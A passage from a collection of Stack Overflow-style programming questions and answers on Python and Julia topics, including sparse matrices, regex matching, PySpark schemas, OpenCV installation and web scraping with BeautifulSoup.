>>> dtr1 = datetimerange.DateTimeRange(start_1, end_1)
>>> dtr2 = datetimerange.DateTimeRange(start_2, end_2)
>>>
>>> dtr1 in dtr2
True
>>> dtr2 in dtr1
False
HTH
|
Similar function to to_scipy_sparse_matrix in Julia sparse matrices functions
Question: I would like to ask if there is an equivalent, in the **Julia** language and its sparse-matrix [functions](http://docs.julialang.org/en/release-0.3/stdlib/arrays/?highlight=sparse#sparse-matrices), to [to_scipy_sparse_matrix](https://networkx.github.io/documentation/latest/reference/generated/networkx.convert_matrix.to_scipy_sparse_matrix.html#networkx.convert_matrix.to_scipy_sparse_matrix) in **networkx**.
I am looking for an equivalent to calling this function in the [eigenvector centrality algorithm](https://github.com/networkx/networkx/blob/master/networkx/algorithms/centrality/eigenvector.py#L206).
Is it possible to run this function, as used in the eigenvector centrality code above, in **Julia** to produce the same output?
Thanks for any suggestions. I have been struggling with this for a few hours and am unable to make any progress.
**Edit:**
Python version :
import networkx as nx
import scipy
G = nx.Graph()
G.add_edge(1, 2, w=1.0 )
G.add_edge(1, 3, w=0.5 )
G.add_edge(2, 3, w=2.5 )
M = nx.to_scipy_sparse_matrix(G, nodelist=list(G), weight='w',dtype=float)
print(M)
Output:
(0, 1) 1.0
(0, 2) 0.5
(1, 0) 1.0
(1, 2) 2.5
(2, 0) 0.5
(2, 1) 2.5
Julia version:
using Graphs
g1 = Graphs.graph(Graphs.ExVertex[], Graphs.ExEdge{Graphs.ExVertex}[], is_directed=false)
d = "dist"
v1 = add_vertex!(g1, "a")
v2 = add_vertex!(g1, "b")
v3 = add_vertex!(g1, "c")
e12 = add_edge!(g1, v1, v2)
e12.attributes[d]=1.0
e13 = add_edge!(g1, v1, v3)
e13.attributes[d]=0.5
e23 = add_edge!(g1, v2, v3)
e23.attributes[d]=2.5
Answer: Try this (following the OP's Julia code):
julia> triple(e,d) = (e.source.index,e.target.index,e.attributes[d])
triple (generic function with 1 method)
julia> M = sparse(map(collect,zip([triple(e,d) for e in edges(g1)]...))...,length(g1.vertices),length(g1.vertices))
2x3 sparse matrix with 3 Float64 entries:
[1, 2] = 1.0
[1, 3] = 0.5
[2, 3] = 2.5
`triple` returns a (source, target, d-attribute) triple, which might come in useful in other places as well.
The sparse matrix is created with the `sparse(I,J,D,rows,cols)` constructor, where `I,J,D` are all same-length vectors and, for each index `i`, the matrix has the value `D[i]` at position `I[i],J[i]`.
If a symmetric weight matrix is needed, use the following:
julia> M = M+M'
3x3 sparse matrix with 6 Float64 entries:
[2, 1] = 1.0
[3, 1] = 0.5
[1, 2] = 1.0
[3, 2] = 2.5
[1, 3] = 0.5
[2, 3] = 2.5
|
Python Regex Matching
Question: I am reading a text file line by line (all strings). I am trying to make the `card_type` condition true so that the code enters the if statement; however, it never enters the IF statement. The output that comes out from the print line is:
imm48-1gb-sfp/imm48-1gb-sfp
imm-2pac-fp3/imm-2pac-fp3
imm5-10gb-xfp/imm5-10gb-xfp
sfm4-12/sfm4-12
This is the code:
print str(card_type)
if card_type == re.match(r'(.*)/(.*)',line):
card_type = card_type.group(1)
Answer: [`re.match`](https://docs.python.org/2/library/re.html#re.match) will return a [`MatchObject`](https://docs.python.org/2/library/re.html#re.MatchObject) if there's a match, or `None` if there wasn't one. The following code will capture the part before the `/` character:
import re
line = 'imm48-1gb-sfp/imm48-1gb-sfp'
match = re.match(r'(.*?)/', line)
if match:
card_type = match.group(1)
print card_type
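If you also need the part after the slash, the question's original two-group pattern works the same way:
match = re.match(r'(.*)/(.*)', line)
if match:
    before, after = match.group(1), match.group(2)
    print before, after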
|
Compile python module imports
Question: I have a problem. I wrote a Python script to make my work faster and now I want to share it with my team.
I don't want them to mess with installing imports that are missing from the basic Python installation. I know there is a way to compile Python to an exe, but I wonder if I can compile the code and the imports without messing with py2exe. Does Python have a built-in solution for that?
I saw that Python has a pyc compile option. Does it compile the imported modules as well?
Thanks, Or
Answer: No, I don't believe there is a built-in standalone compilation mode native to Python. A .pyc file is compiled bytecode, but not the kind you usually distribute as an executable program (meaning you would still need the Python interpreter).
If you don't want to use py2exe or other similar packages, I advise you to use a portable version of Python with which you can distribute your software (see for example [WinPython](http://winpython.github.io/)). The easiest way to accomplish this is to ship the portable distribution together with your code and perhaps a batch file (or similar, if you want .exe-like behavior).
NOTE: You can provide the byte-compiled (.pyc) code of the libraries you are using and put it in the root of your software (or just state where those imports should happen), but I predict this will give you problems in the future due to dependencies between different libraries. So it's possible, although I would hardly consider it a good solution for what it seems you are trying to achieve.
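If you do decide to ship byte-compiled files, the standard library's `compileall` module can generate them for a whole directory tree (the folder name below is just an example):
import compileall

# byte-compile every .py file under the project folder into .pyc files
compileall.compile_dir('my_project', force=True)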
|
Python inverted dictionaries
Question: I'm currently writing a function that takes a dictionary with immutable values
and returns an inverted dictionary. So far, my code is getting extremely
simple tests right, but it still has some kinks to work out
def dict_invert(d):
inv_map = {v: k for k, v in d.items()}
return inv_map
list1 = [1,2,3,4,5,6,7,8]
list2 = {[1]:3245,[2]:4356,[3]:6578}
d = {['a']:[],['b']:[]}
d['a'].append(list1)
d['b'].append(list2)
How do I fix my code so that it passes the test cases?
My only thoughts are to change list 2 to `[1:32, 2:43, 3:54, 4:65]`; however,
I would still have a problem with having the `"[]"` in the right spot. I have
no idea how to do that.
Answer: The trick is to realize that multiple keys can have the same values, so when
inverting, you must make sure your values map to a list of keys.
from collections import defaultdict
def dict_invert(d):
inv_map = defaultdict(list)
for k, v in d.items():
inv_map[v].append(k)
return inv_map
**EDIT:**
Just adding a bit more helpful info...
The `defaultdict(list)` supplies a new empty `list()` whenever a missing key is accessed via `[]` (where a normal dict would raise `KeyError`); note that `.get` on a missing key still returns `None`, as with a normal dict.
With that defaultdict in place, you can use a bit of logic to group keys
together... here's an example to illustrate (from my comment above)
Original dict: K0 -> V0, K1 -> V0, K2 -> V0
Should invert to: V0 -> [K0, K1, K2]
**EDIT 2:**
Your tests seem to be forcing you into using a normal dict, in which case...
def dict_invert(d):
inv_map = {}
for k, v in d.items():
if v not in inv_map:
inv_map[v] = []
inv_map[v].append(k)
return inv_map
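A quick check of the plain-dict version above:
grades = {'K0': 'V0', 'K1': 'V0', 'K2': 'V1'}
print(dict_invert(grades))
# {'V0': ['K0', 'K1'], 'V1': ['K2']}  (key order may vary)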
|
Error with executing CGI script - writable directory for matplotlib
Question: I know that the similar problem was solving in this topic:
[Setting Matplotlib MPLCONFIGDIR: consider setting MPLCONFIGDIR to a writable
directory for matplotlib configuration
data](http://stackoverflow.com/questions/9827377/setting-matplotlib-
mplconfigdir-consider-setting-mplconfigdir-to-a-writable-dir)
, but I have a problem with executing a CGI script. I use an HTML form to input some data, build an OLS model with statsmodels based on these data, and want to print the result as an HTML page. If I execute the Python script it gives me this error:
<http://textuploader.com/5nrhf>
Basicaly I get error - `Failed to create /var/www/.matplotlib; consider
setting MPLCONFIGDIR to a writable directory for matplotlib configuration
data`
I read about setting MPLCONFIGDIR in code before you import matplotlib and making sure the directory has permissions such that it can be written to by the app, like this:
import os
os.environ['MPLCONFIGDIR'] = "/home/lab/website/graph"
import matplotlib
or
import os
import tempfile
os.environ['MPLCONFIGDIR'] =tempfile.mkdtemp()
import matplotlib
but I don't import the matplotlib module in my script, only `cgi`, `statsmodels.api`, `MySQLdb` and `numpy`.
If you want, here is my CGI script - <http://textuploader.com/5nrx4>
I don't know whether I must set permissions on the matplotlib folder so that it can be written to by me as the executor of the CGI script, or somehow point matplotlib to a different path that is writable by me. By the way, I don't own the server; it is just a school server.
Answer: You don't explicitly import `matplotlib`, but `statsmodels.api` imports `pandas`, and in turn `pandas` imports `matplotlib` (you can see all that by reading through your traceback).
So, you still need to have a writable `MPLCONFIGDIR` in order to run your
script. You already have the answer how to do that, but in case you want to
read more about it, there is some documentation
[here](http://matplotlib.org/faq/environment_variables_faq.html#envvar-
MPLCONFIGDIR) about setting `matplotlib` environment variables.
* * *
It should be enough to just add this in your file before you import
`statsmodels.api`:
import os
os.environ['MPLCONFIGDIR'] = "/home/lab/website/graph"
|
Appending the byte representation of a float to a python bytearray
Question: I am using python with ctypes to read an array of bytes and store this in a
python bytearray. This array is then transmitted as a UDP packet.
I would like to append the time to this array of bytes, and believe the way to
do this is to do:
t = time.time()
Which returns a python float. Then find the location this is stored in memory,
and extract the array of bytes (either 4 or 8, I'm not sure) which represent
the float, and append these bytes to my existing bytearray.
Any suggestions for time-stamping a UDP packet made of a bytearray gratefully
received.
My minimal code is as follows:
class Host:
def __init__(self):
self.data = (ctypes.c_ubyte * 4112)()
self.data_p = ctypes.byref(self.data)
self.byte_data = bytearray(4120)
self.t = (ctypes.c_ubyte * 8)()
self.t_p = ctypes.byref(self.t)
self.t = time.time()
self.Data_UDP_IP = "127.0.0.1"
self.Data_UDP_PORT = 8992
self.DataSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def genBytearray(self):
# <function that fills self.data with actual data>
data = ctypes.cast(self.data_p, ctypes.POINTER(ctypes.c_ubyte))
self.t = time.time()
t_cast = ctypes.cast(self.t_p, ctypes.POINTER(ctypes.c_ubyte))
self.byte_data[0:4112] = data[0:4112]
self.byte_data[4112:4120] = t_cast[0:8]
import time
import ctypes
import socket
Host1 = Host()
Host1.genBytearray()
Host1.DataSock.sendto(Host1.byte_data, (Host1.Data_UDP_IP, Host1.Data_UDP_PORT))
Problem is, it seems t_cast is always equal to 0. I think by calling:
self.t = time.time()
I am not actually writing the time to the location pointed to by self.t_p.
Been stuck on this for a while and can't help but think there's an easier way.
I have come across struct.pack, but python seems to crash when I try to use
it.
Answer: In case anyone stumbles across this:
t = (ctypes.c_double * 1)(time.time())
tnew = ctypes.cast(t, ctypes.POINTER((ctypes.c_uint8 * 8)))
tnew.contents[0:8]
Extracts the uint8 representations of the 64 bit double returned by
time.time().
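For what it's worth, the standard-library `struct` module produces the same 8 bytes without any ctypes plumbing, which may be the easier way hinted at in the question:
import struct
import time

payload = bytearray(4112)  # placeholder for the real data
payload += struct.pack('d', time.time())  # append the 8-byte native-endian double
# the receiver can recover it with struct.unpack('d', payload[-8:])[0]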
|
How to more efficiently search through an acoustid database with over 30 million rows?
Question: I'm currently playing around with an open source music recognition project
called acoustid. I've imported a table with over 30 million rows (300 GB of data), but it takes A TON of time to simply SELECT these rows. Currently,
selecting 200,000 rows can take 30 seconds.
The project offers acoustid-index to index the rows by only looking up the
first 15 seconds of a fingerprint and storing this on the hdd... which is then
loaded into ram. <https://bitbucket.org/acoustid/acoustid-index/overview>
Only, I have no idea how to use this. The directions are confusing. It seems
this was created for PostgreSQL. I'm using MySQL and Python on the server I'm
working on. Can I still use this to index my db?
Any suggestions as to how I use this to index the rows in the database? Are
there any other ways I can make the search through this database more
efficient?
Answer: In MySQL you can use an index on a BLOB/TEXT column by defining the prefix length you want the index to cover:
CREATE INDEX idx_nn_1 ON sometable(accoustic(500));
This would index the first 500 bytes of your fingerprint (i.e., not 15 seconds). To get to 15 seconds, you could compute an MD5 sum of that portion, add it as an extra column and then query for the MD5 sum of those 15 seconds. Alternatively, you could just use an MD5 sum over the complete song.
|
Google App Engine: ImportError: No module named appengine.ext
Question: I am trying to write a test for my GAE programme which uses the datastore.
Following [Google's
Documentation](https://cloud.google.com/appengine/docs/python/tools/localunittesting),
I see that I should be adding the path to my SDK into my PYTHONPATH. I did
this using:
import sys
sys.path.remove('/usr/local/lib/python2.7/dist-packages') # Has a 'google' module, which I want to be sure isn't interfering.
sys.path.insert(1,'/home/olly/google-cloud-sdk/platform/google_appengine')
sys.path.insert(1, '/home/olly/google-cloud-sdk/platform/google_appengine/lib/yaml/lib')
Then when the file is run:
Traceback (most recent call last):
File "myapp_tests.py", line 20, in <module>
from google.appengine.ext import ndb
ImportError: No module named appengine.ext
I have installed the SDK in the location above, and looking in
`/home/olly/google-cloud-sdk/platform/google_appengine/` I found the `google`
folder, which has an `__init__.py` in it, along with `appengine`. Basically,
the folder structure looks good to me, with them all being named correctly and
having `__init__.py` files.
In an interactive console, after running the commands above, I found that I
could run:
import google
no problem, but when I tried
import google.appengine
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ImportError: No module named appengine
It was my understanding that having the `__init__.py` files in the
directories meant that they could be imported as above. I also did a `sudo
find / --name "google"`, and the only thing that showed up that is also in my
PYTHONPATH was the `/usr/local/lib/python2.7/dist-packages`, which I
explicitly removed, and also inserted the rest of my paths in front of anyway.
I tried using GAE's own method of:
import dev_appserver
dev_appserver.fix_sys_path()
which added a whole lot of paths to sys.path, but still didn't help me make it
work.
I also found that when I add `'/home/olly/Servers/google_appengine/google'` to
my paths, I can run:
import appengine.ext
but running:
from appengine.ext import ndb
causes:
Traceback (most recent call last):
File "booking_function_tests.py", line 16, in <module>
from appengine.ext import ndb
File "/home/olly/Servers/google_appengine/google/appengine/ext/ndb/__init__.py", line 7, in <module>
from tasklets import *
File "/home/olly/Servers/google_appengine/google/appengine/ext/ndb/tasklets.py", line 69, in <module>
from .google_imports import apiproxy_stub_map
File "/home/olly/Servers/google_appengine/google/appengine/ext/ndb/google_imports.py" , line 11, in <module>
from google3.storage.onestore.v3 import entity_pb
ImportError: No module named google3.storage.onestore.v3
Am I missing something really obvious? How should I go about importing ndb?
EDIT: I'm running the latest SDK (1.9.34), but I have the following code in my
google_imports.py:
try:
from google.appengine.datastore import entity_pb
normal_environment = True
except ImportError:
try:
from google3.storage.onestore.v3 import entity_pb
normal_environment = False
except ImportError:
# If we are running locally but outside the context of App Engine.
try:
set_appengine_imports()
from google.appengine.datastore import entity_pb
normal_environment = True
except ImportError:
raise ImportError('Unable to find the App Engine SDK. '
'Did you remember to set the "GAE" environment '
'variable to be the path to the App Engine SDK?')
Also, `google.__path__` gives me the `'/usr/local/lib/python2.7/dist-
packages'` path which I thought I removed earlier. Here is an excerpt of how
I'm removing it:
import sys
sys.path.insert(1, '/home/olly/Servers/google_appengine')
sys.path.insert(1, '/home/olly/Servers/google_appengine/lib/yaml/lib')
sys.path.remove('/usr/local/lib/python2.7/dist-packages')
import google
print google.__path__
print sys.path
['/usr/local/lib/python2.7/dist-packages/google']
['/home/olly/Servers/google_appengine/myapp', '/home/olly/Servers/google_appengine/lib/yaml/lib', '/home/olly/Servers/google_appengine/google', '/home/olly/Servers/google_appengine', '/usr/lib/python2.7', '/usr/lib/python2.7/plat-x86_64-linux-gnu', '/usr/lib/python2.7/lib-tk', '/usr/lib/python2.7/lib-old', '/usr/lib/python2.7/lib-dynload', '/usr/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages/PILcompat', '/usr/lib/python2.7/dist-packages/gtk-2.0', '/usr/lib/pymodules/python2.7', '/usr/lib/python2.7/dist-packages/ubuntu-sso-client', '/usr/lib/python2.7/dist-packages/wx-2.8-gtk2-unicode']
So my sys.path is updated, but `import google` seems to still be importing
from the no-longer-there path, which would be the crux of my problem I guess.
Do I need to reload the path or something?
Answer: I run into these problems a lot less by always running inside a
[virtualenv](https://virtualenv.readthedocs.org/en/latest/).
I agree with snakecharmerrb that you should print `google.__file__` or `google.__path__` to figure out exactly what you're importing.
This snippet might also solve your problem:
import google
gae_dir = '/path/to/appengine_sdk//google_appengine/google'
google.__path__.append(gae_dir)  # extend the google package's search path with the SDK copy
import google.appengine  # now it's on your import path
|
How do I resolve debug/release conflict after installing opencv under anaconda
Question: Tried to get started with OpenCV under Python today, although I have no
experience with the former and very little experience with the latter. Since I
am inexperienced, I followed a canned approach for the install, as detailed
below. Now I am trying to figure out if I need to install from source.
Started by downloading and installing Anaconda with Python 2.7.
Downloaded opencv 3.1.0 for Windows and moved the cv2.pyd file into
C:\Anaconda2\Lib\site-packages. I believe this means I installed a binary
rather than from source. Didn't tinker with any pathnames or environmental
variables at this point.
Used Anaconda Launcher to start Spyder. import cv2 ran in the Spyder console
without complaint. `print cv2.__version__` returned 3.1.0, which I interpreted
as a successful install.
Trouble began when I tried to do something. cv2.imread is returning a None
value. The obvious explanation for this is that I am supplying the wrong
filename but I don't think that's it. I ran os.listdir('.') and then
cv2.imread() to eliminate this possibility. The more sinister explanation is
that I have mixed Debug and Release libraries (see this thread [OpenCV
imread(filename) fails in debug mode when using release
libraries](http://stackoverflow.com/questions/9125817/opencv-imreadfilename-
fails-in-debug-mode-when-using-release-libraries)).
My question is: how do I check if a release / debug conflict is indeed causing
the problem? I see some advice that references changing CMake parameters and
rebuilding but since I just dropped a binary into a folder, that doesn't
really relate to how I installed OpenCV. This brings me back to the question I
started with: do I need to abandon the binary and reinstall from the source?
That is a daunting prospect for me. I ran cv2.getBuildInformation() and it
dumped a bunch of text on my console but I couldn't figure out what it meant.
It seemed to reference both Release and Debug modes.
EDIT: I'm running 64 bit Windows 7 Pro
John
Answer: You might want to install OpenCV via [conda
packages](http://conda.pydata.org/docs/) which downloads the binaries and does
all the configuration for you. Open a command window (cmd.exe) and type:
conda update conda
conda install --channel https://conda.anaconda.org/menpo opencv
BUT, since you are just starting out, I would recommend using Python 3. If you prefer not to do a fresh installation, you can create a conda environment with Python 3.4 which runs independently and will not mess up any of your existing installations:
conda create -n OpenCVenv python=3.4
To activate this environment you will need to run the following command every
time you want to use opencv or install new packages
activate OpenCVenv
Once you have activated the environment you can install opencv3:
conda install --channel https://conda.anaconda.org/menpo opencv3
Note that if you want to install additional packages, such as Spyder, inside the environment, you can do so:
conda install spyder
That's because Spyder is supported within Anaconda. For example, you can install all the [packages included in Anaconda](https://docs.continuum.io/anaconda/pkg-docs):
conda install anaconda
|
BeautifulSoup not reading entire HTML obtained by requests
Question: I am trying to scrape data from a table of sporting statistics presented as
HTML using the BeautifulSoup and requests libraries. I am running both of them
on Python 3.5. I seem to be successfully obtaining the HTML via requests
because when I display `r.content`, the full HTML of the website I am trying
to scrape is displayed. However, when I pass this to BeautifulSoup,
BeautifulSoup drops the bulk of the HTML which are the tables of statistics
themselves.
If you take a look at the
[website](http://afltables.com/afl/stats/games/2015/031420150402.html) in
question, the HTML from "Scoring Progression" onward is dropped.
I think the problem relates to the pieces of HTML which are included between
brackets ('[' and ']') but I have not been able to develop a workaround. I
have tried the html, lxml and html5lib parsers for BeautifulSoup, to no avail.
I have also tried providing 'User-Agent' headers and that did not work either.
My code is as below. For brevity's sake I have not included the output.
import requests
from bs4 import BeautifulSoup
r = requests.get('http://afltables.com/afl/stats/games/2015/031420150402.html')
soup = BeautifulSoup(r.content, 'html5lib')
print(soup)
Answer: I used a different parser and it seemed to work; just the default html parser.
from bs4 import BeautifulSoup
from urllib.request import urlopen as uReq
url = 'http://afltables.com/afl/stats/games/2015/031420150402.html'
client = uReq(url) # grabs the page
soup = BeautifulSoup(client.read(), 'html.parser') # using the default html parser
tables = soup.find_all('table') # gets all the tables
print(tables[7]) # scoring progression table, the 8th's table
Though if you had tried something like `soup.table` without using `find_all` first, it would seem as if the other tables had been dropped, since `soup.table` only returns the first table.
|
Building a StructType from a dataframe in pyspark
Question: I am new to Spark and Python and am facing the difficulty of building a schema from a metadata file that can be applied to my data file. Scenario: the metadata file for the data file (csv format) contains the columns and their types, for example:
id,int,10,"","",id,"","",TRUE,"",0
created_at,timestamp,"","","",created_at,"","",FALSE,"",0
I have successfully converted this to a dataframe that looks like:
+--------------------+---------------+
| name| type|
+--------------------+---------------+
| id| IntegerType()|
| created_at|TimestampType()|
| updated_at| StringType()|
But when I try to convert this to a StructField format using this
fields = schemaLoansNew.map(lambda l:([StructField(l.name, l.type, 'true')]))
OR
schemaList = schemaLoansNew.map(lambda l: ("StructField(" + l.name + "," + l.type + ",true)")).collect()
And then later convert it to StructType, using
schemaFinal = StructType(schemaList)
I get the following error:
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/opt/mapr/spark/spark-1.4.1/python/pyspark/sql/types.py", line 372, in __init__
assert all(isinstance(f, DataType) for f in fields), "fields should be a list of DataType"
AssertionError: fields should be a list of DataType
I am stuck on this due to my lack of knowledge of DataFrames; can you please advise how to proceed? Once I have the schema ready, I want to use createDataFrame to apply it to my data file. This process has to be done for many tables, so I do not want to hardcode the types; rather, I want to use the metadata file to build the schema and then apply it to the RDD.
Thanks in advance.
Answer: The fields argument has to be a list of `DataType` objects. This:
.map(lambda l:([StructField(l.name, l.type, 'true')]))
generates, after `collect`, a `list` of `lists` of `tuples` (`Rows`) of `DataType` (`list[list[tuple[DataType]]]`), not to mention that the `nullable` argument should be a boolean, not a string.
Your second attempt:
.map(lambda l: ("StructField(" + l.name + "," + l.type + ",true)")).
generates after `collect` a `list` of `str` objects.
Correct schema for the record you've shown should look more or less like this:
from pyspark.sql.types import *
StructType([
StructField("id", IntegerType(), True),
StructField("created_at", TimestampType(), True),
StructField("updated_at", StringType(), True)
])
Although using distributed data structures for a task like this is serious overkill, not to mention inefficient, you can try to adjust your first solution as follows:
StructType([
StructField(name, eval(type), True) for (name, type) in df.rdd.collect()
])
but it is not particularly safe (`eval`). It could be easier to build a schema
from JSON / a dictionary. Assuming you have a function which maps from a type description to a canonical type name:
def get_type_name(s: str) -> str:
"""
>>> get_type_name("int")
'integer'
"""
_map = {
'int': IntegerType().typeName(),
'timestamp': TimestampType().typeName(),
# ...
}
return _map.get(s, StringType().typeName())
You can build a dictionary of the following shape:
schema_dict = {'fields': [
{'metadata': {}, 'name': 'id', 'nullable': True, 'type': 'integer'},
{'metadata': {}, 'name': 'created_at', 'nullable': True, 'type': 'timestamp'}
], 'type': 'struct'}
and feed it to `StructType.fromJson`:
StructType.fromJson(schema_dict)
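A short sketch tying these pieces together; here `pairs` stands in for the collected (name, type) entries from the metadata file, and `sqlContext` / `data_rdd` are assumed to exist in this Spark 1.4-era session:
pairs = [("id", "int"), ("created_at", "timestamp"), ("updated_at", "string")]
schema_dict = {
    'type': 'struct',
    'fields': [
        {'metadata': {}, 'name': name, 'nullable': True, 'type': get_type_name(t)}
        for name, t in pairs
    ]
}
schema = StructType.fromJson(schema_dict)
df = sqlContext.createDataFrame(data_rdd, schema)  # apply the schema to the data file's RDD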
|
python3 interpreter gives different results than script for scipy.misc.imread
Question: I am trying to read image data into Python as a matrix.
To this extent, I am trying to use
`scipy.misc.imread('image.jpg').astype(np.float)`.
When I execute the proper sequence of steps from a `python3` interpreter,
everything works swimmingly, and I get a matrix as expected.
When I invoke the command from a script (`python3 foo.py`...), however, I get
an error complaining that the argument to convert via `float` cannot be of
type `JpegImageFile`. I've run `pip install -U pillow` to make sure that PIL is available.
What gives? How could this be possible? I've verified over and over that the
same lines of code are executed in each case, the only difference seems to be
that the invocation inside of a script happens inside of a defined function,
but even if I `pdb.set_trace()` from elsewhere in the script the same results
happen.
What could be causing fluctuation in results from the interpreter to the
script?
**EDIT** : OK, to be precise, I am running the `neural_style.py` script from
here: <https://github.com/anishathalye/neural-style> . `scipy`, `numpy`,
`tensorflow`, and `pillow` must be installed. I am using `python3`. Any
parameters for `--content`, `--styles`, and `--output` should work to reproduce the bug.
Full error traceback:
Traceback (most recent call last):
File "neural_style.py", line 150, in <module>
main()
File "neural_style.py", line 84, in main
content_image = imread(options.content)
File "neural_style.py", line 141, in imread
return scipy.misc.imread(path).astype(np.float)
TypeError: float() argument must be a string or a number, not 'JpegImageFile'
But, a small simple script such as the following actually works:
import numpy as np
import scipy.misc
print(scipy.misc.imread('content').astype(np.float))
Answer: I figured out the solution to this. The `neural_style.py` script seems to be
getting a different version of `scipy` module (or submodule) due to a side
effect of importing `stylize.py` and, in turn, `vgg.py`. Adding this line:
import scipy.misc
To the very top of `stylize.py` (in front of `import vgg`) fixes it.
I'm really not sure why, though.
|
Python iteration over non-sequence in an array with one value
Question: I am writing a code to return the coordinates of a point in a list of points.
The list of points class is defined as follows:
class Streamline:
## Constructor
# @param ID Streamline ID
# @param Points list of points in a streamline
def __init__ ( self, ID, points):
self.__ID = ID
self.__points = points
## Get all Point coordinates
# @return Matrix of Point coordinates
def get_point_coordinates ( self ):
return np.array([point.get_coordinate() for point in self.__points])
With
class Point:
## Constructor
# @param ID Streamline ID
# @param cor List of Coordinates
# @param vel List of velocity vectors (2D)
def __init__ ( self, ID, coord, veloc):
self.__ID = ID
self.set_coordinate( coord )
self.set_velocity( veloc )
The thing is that I start my code by defining a Streamline with one Point in
the point list. A little down the road I call the function
get_point_coordinates and the iteration over the list of points raises the
following error:
return np.array([point.get_coordinate() for point in self.__points])
TypeError: iteration over non-sequence
I need to find a way to bypass this error and neatly return just a 1x2 matrix
with the point coordinates.
I've had a look at [this
question](http://stackoverflow.com/questions/11871593/python-iteration-over-
non-sequence) but it wasn't very helpful.
Answer: 1. Either call the Streamline-constructor with a sequence instead of a single point: `sl = Streamline(ID, [first_point])`
2. Or have the constructor wrap the single point in a list, so the attribute is always iterable:
class Streamline:
def __init__ ( self, ID, first_point):
self.__ID = ID
self.__points = [first_point]
3. It is generally a bad idea to write the constructor so that it accepts both a single point (`Streamline(ID, point1)`) and a sequence of points (`Streamline(ID, [point1, point2, ...])`). If you want that anyway, you can do:
from collections import Iterable
class Streamline:
def __init__ ( self, ID, points):
self.__ID = ID
self.__points = points if isinstance(points, Iterable) else [points]
4. Better than 3. would be to unpack the points given in arguments via `*` to enable `Streamline(ID, point1)` and `Streamline(ID, point1, point2, ...)`.
class Streamline:
def __init__ ( self, ID, *points):
self.__ID = ID
self.__points = points
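For instance, with variant 4 the call sites would look like this (a small sketch; the Point setters are assumed to exist as in the question):
p1 = Point(1, [0.0, 0.0], [1.0, 0.0])
p2 = Point(2, [1.0, 0.5], [0.5, 0.5])
sl_single = Streamline(10, p1)      # self.__points == (p1,)
sl_many = Streamline(11, p1, p2)    # self.__points == (p1, p2)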
|
Install BeautifulSoup on python3.5, Mac , ImportError:No module named 'bs4'
Question: I want to install BeautifulSoup, I use python3.5 on Mac
I have tried many methods:
I try to download `beautifulsoup4-4.4.1.tar.gz` from official website,and in
terminal type:
> $ cd [my path]
>
> $ sudo python3.5 ./setup.py install
I also tried:
> $ sudo pip3 install beautifulsoup4
and the terminal says:
> Requirement already satisfied (use --upgrade to upgrade): beautifulsoup4 in
> /Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-
> packages/beautifulsoup4-4.4.1-py3.5.egg
So I think it is already installed, but when I type the following in Python 3 (I use PyCharm):
> from bs4 import BeautifulSoup
It says
> Traceback (most recent call last): File "", line 1, in File
> "/Applications/PyCharm Edu.app/Contents/helpers/pydev/pydev_import_hook.py",
> line 21, in do_import module = self._system_import(name, *args, **kwargs)
> ImportError: No module named 'bs4'
Did I install bs4 properly? How can I import bs4 into python3?
Answer: I have solved this problem! Just as @Martjin Pieters said, PyCharm can install packages through the menu:
PyCharm -> Preference -> Project -> Project interpreter
Check that the interpreter is Python 3 and click "+" at the bottom (if you see BeautifulSoup in the frame, click "-" to uninstall it first); then you can install it properly.
[see this picture](http://i.stack.imgur.com/UXLYt.png)
|
Adding new line to data for csv in python
Question: I'm trying to scrape data from
<http://www.hoopsstats.com/basketball/fantasy/nba/opponentstats/16/12/eff/1-1>
to create a CSV file using Python 3.5. I've figured out how to do so, but all
the data is in the same row when I open the file in Excel.
import sys
import requests
from bs4 import BeautifulSoup
import csv
r = requests.get('http://www.hoopsstats.com/basketball/fantasy/nba/opponentstats/16/12/eff/1-1')
soup = BeautifulSoup(r.text, "html.parser")
stats = soup.find_all('table', 'statscontent')
pgFile = open ('C:\\Users\\James\\Documents\\testpoop.csv', 'w')
for table in soup.find_all('table', 'statscontent','a'):
stats = [ stat.text for stat in table.find_all('center') ]
team = [team for team in table.find('a')]
p = (team,stats)
z = str(p)
a = z.replace("]",'')
b = a.replace("'", "")
c = b.replace(")", "") #Only way I knew how to clean up extra characters
d = c.replace("(", "")
e = d.replace("[", "")
print(e) #printing while testing
pgFile.writelines(e)
pgFile.close()
The data comes out nicely in the Python shell:
Boston, 1, 67, 47.9, 19.6, 5.2, 7.2, 1.8, 0.5, 4.3, 4.1, 4.3, 0.9, 6.8-16.1, .421, 1.6-4.9, .324, 4.4-5.4, .816, 19.7, -6.8
San Antonio, 2, 67, 47.8, 19.7, 5.0, 8.7, 1.9, 0.3, 3.5, 3.3, 4.2, 0.8, 7.4-18.0, .411, 1.5-4.6, .317, 3.4-4.2, .819, 20.7, -2.4
Atlanta, 3, 67, 48.7, 19.2, 5.6, 8.4, 2.3, 0.6, 4.1, 3.7, 4.6, 1.0, 7.1-17.6, .401, 2.0-5.8, .338, 3.2-3.8, .828, 20.8, -5.6
Miami, 4, 67, 49.8, 20.6, 5.2, 8.0, 1.9, 0.3, 3.2, 3.6, 4.3, 0.9, 7.6-18.5, .407, 1.9-5.3, .348, 3.7-4.5, .814, 21.0, 2.1
L.A.Clippers, 5, 66, 48.2, 21.0, 5.7, 8.7, 1.9, 0.2, 4.1, 4.5, 4.6, 1.1, 7.6-18.7, .405, 1.9-5.4, .346, 3.9-4.9, .799, 21.1, -7.0
Toronto, 6, 66, 48.0, 20.5, 5.3, 8.8, 1.7, 0.6, 3.8, 3.7, 4.4, 0.9, 7.4-18.0, .412, 2.1-5.9, .349, 3.6-4.4, .826, 21.6, -4.3
Charlotte, 7, 66, 48.1, 19.3, 6.0, 9.1, 1.6, 0.6, 3.4, 4.1, 5.1, 0.9, 7.1-17.8, .399, 2.0-6.4, .321, 3.0-3.7, .802, 21.7, -4.5
Milwaukee, 8, 68, 48.8, 19.3, 5.4, 9.1, 1.9, 0.3, 4.2, 3.5, 4.6, 0.8, 6.8-15.9, .425, 1.9-6.0, .311, 3.9-5.0, .788, 21.7, 2.1
Utah, 9, 67, 49.3, 21.9, 5.5, 8.1, 2.3, 0.4, 3.7, 3.4, 4.5, 1.0, 7.8-18.3, .424, 2.2-5.7, .382, 4.1-5.3, .787, 22.7, 5.8
